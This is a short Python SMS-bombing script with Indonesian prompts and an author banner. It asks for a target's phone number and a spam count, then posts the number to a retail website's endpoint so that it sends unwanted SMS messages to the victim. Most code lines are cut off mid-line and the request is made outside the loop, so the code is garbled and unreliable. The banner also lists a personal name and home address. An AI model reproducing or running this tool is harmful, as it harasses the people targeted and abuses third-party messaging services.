import os, sys, time, requests
from requests import post

def lagi():
        l = input('Mau Spam Lagi Tod? [y/>
        if l == 'y':
                main()
        elif l == 'n':
                sys.exit()


def main():
        os.system('clear')
        os.system('figlet DKC')
        banner = '''
+♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪+
{♥} ♦Author♦ ≈ Ferdy Ardiansyah
{♥} ♦Youtube♦≈ Dawet Tv
{♥} ♦Alamat♦ ≈ Dsn3 DenaiKuala
{♦} ♦Kec♦    ≈ Panta Labu
{♥} ♦Kab♦    ≈ Deli Serdang
{♥} ♦Kota♦   ≈ Medan
 ♣MAAF SLUR MINIMAL SPAMNYA HANYA 1
  KARENA WEBSITE NYA ADA YANG ERROR
  KALAU MAU SPAM BANYAK HARUS INSTALL
  SCRIPTNYA LAGI.MAAF YA SLUR SAYA GAK
  SEMPAT EDIT HTMLNYA♦
+♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪+
'''

        print(banner)
        no = input('No hp Target Loh Tod >
        jml = int(input('Jumlah Spam : ')>

        ua = {
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Linux>
        'Referer': 'https://www.mapclub.c>
        }

        dat = {
        'phone': no,
        }

        sendSms = requests.post('https://>

        for x in range(jml):
                time.sleep(3)
                if 'error' in sendSms.tex>
                        print('Spam Sms '>
                else:
                        print('Spam Sms '>

main()
lagi()
